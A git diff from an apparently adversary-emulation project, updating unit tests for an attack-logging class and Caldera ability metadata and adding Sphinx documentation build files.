self.assertEqual(data[0]["sub_type"], "by PurpleDome") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["command"], command) + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "execute_payload") + self.assertEqual(data["attack_log"][0]["sub_type"], "by PurpleDome") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["command"], command) def test_execute_payload_stop(self): """ Stopping a execute payload """ @@ -271,12 +369,12 @@ class TestMachineConfig(unittest.TestCase): command=command, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "stop") - self.assertEqual(data[0]["type"], "execute_payload") - self.assertEqual(data[0]["sub_type"], "by PurpleDome") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["command"], command) + self.assertEqual(data["attack_log"][0]["event"], "stop") + self.assertEqual(data["attack_log"][0]["type"], "execute_payload") + self.assertEqual(data["attack_log"][0]["sub_type"], "by PurpleDome") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["command"], command) def test_mitre_fix_ttp_is_none(self): """ Testing the mitre ttp fix for ttp being none """ @@ -285,3 +383,64 @@ class TestMachineConfig(unittest.TestCase): def test_mitre_fix_ttp_is_MITRE_SOMETHING(self): """ Testing the mitre ttp fix for ttp being MITRE_ """ self.assertEqual(app.attack_log.__mitre_fix_ttp__("MITRE_FOO"), "MITRE_FOO") + + # tests for a bunch of default data covering caldera attacks. That way we will have some fallback if no data is submitted: + def test_get_caldera_default_name_missing(self): + """ Testing getting the caldera default name """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_name("missing"), None) + + def test_get_caldera_default_name(self): + """ Testing getting the caldera default name """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_name("bd527b63-9f9e-46e0-9816-b8434d2b8989"), "whoami") + + def test_get_caldera_default_description_missing(self): + """ Testing getting the caldera default description """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_description("missing"), None) + + def test_get_caldera_default_description(self): + """ Testing getting the caldera default description """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_description("bd527b63-9f9e-46e0-9816-b8434d2b8989"), "Obtain user from current session") + + def test_get_caldera_default_tactics_missing(self): + """ Testing getting the caldera default tactics """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_tactics("missing"), None) + + def test_get_caldera_default_tactics(self): + """ Testing getting the caldera default tactics """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_tactics("bd527b63-9f9e-46e0-9816-b8434d2b8989"), "System Owner/User Discovery") + + def test_get_caldera_default_tactics_id_missing(self): + """ Testing getting the caldera default tactics_id """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_tactics_id("missing"), None) + + def test_get_caldera_default_tactics_id(self): + """ Testing getting the caldera default tactics_id """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_tactics_id("bd527b63-9f9e-46e0-9816-b8434d2b8989"), "T1033") + + def test_get_caldera_default_situation_description_missing(self): + """ Testing getting the caldera default situation_description """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_situation_description("missing"), None) + + def test_get_caldera_default_situation_description(self): + """ Testing getting the caldera default situation_description """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_situation_description("bd527b63-9f9e-46e0-9816-b8434d2b8989"), None) + + def test_get_caldera_default_countermeasure_missing(self): + """ Testing getting the caldera default countermeasure """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_countermeasure("missing"), None) + + def test_get_caldera_default_countermeasure(self): + """ Testing getting the caldera default countermeasure """ + al = AttackLog() + self.assertEqual(al.get_caldera_default_countermeasure("bd527b63-9f9e-46e0-9816-b8434d2b8989"), None) diff --git a/tools/human_readable_documentation/Makefile b/tools/human_readable_documentation/Makefile new file mode 100644 index 0000000..5ea5ad1 --- /dev/null +++ b/tools/human_readable_documentation/Makefile @@ -0,0 +1,23 @@ +# Minimal makefile for Sphinx documentation +# + +# You can set these variables from the command line, and also +# from the environment for the first two. +SPHINXOPTS ?= +SPHINXBUILD ?= python3 -m sphinx +SOURCEDIR = source +BUILDDIR = build + +# Put it first so that "make" without argument is like "make help". +help: + @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) + +.PHONY: help Makefile all + +# Catch-all target: route all unknown targets to Sphinx using the new +# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). +%: Makefile + @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) + +all: html epub latexpdf text man + diff --git a/tools/human_readable_documentation/conf.py b/tools/human_readable_documentation/source/conf.py similarity index 98% rename from tools/human_readable_documentation/conf.py rename to tools/human_readable_documentation/source/conf.py index 5b3404c..013c9b8 100644 --- a/tools/human_readable_documentation/conf.py +++ b/tools/human_readable_documentation/source/conf.py @@ -13,6 +13,7 @@ # import os # import sys +master_doc = 'contents' # -- Project information ----------------------------------------------------- diff --git a/tools/shipit.py b/tools/shipit.py index 871f5e5..d6a8469 100755 --- a/tools/shipit.py +++ b/tools/shipit.py @@ -64,7 +64,11 @@ globs = ["TODO.md", "pylint.rc", "shipit_log.txt", "all_caldera_attacks_unique.txt", - "caldera_subset.txt"] + "caldera_subset.txt", + "templates/*.rst", + "tools/human_readable_documentation/source/conf.py", + "tools/human_readable_documentation/Makefile", + ] try: os.remove(filename)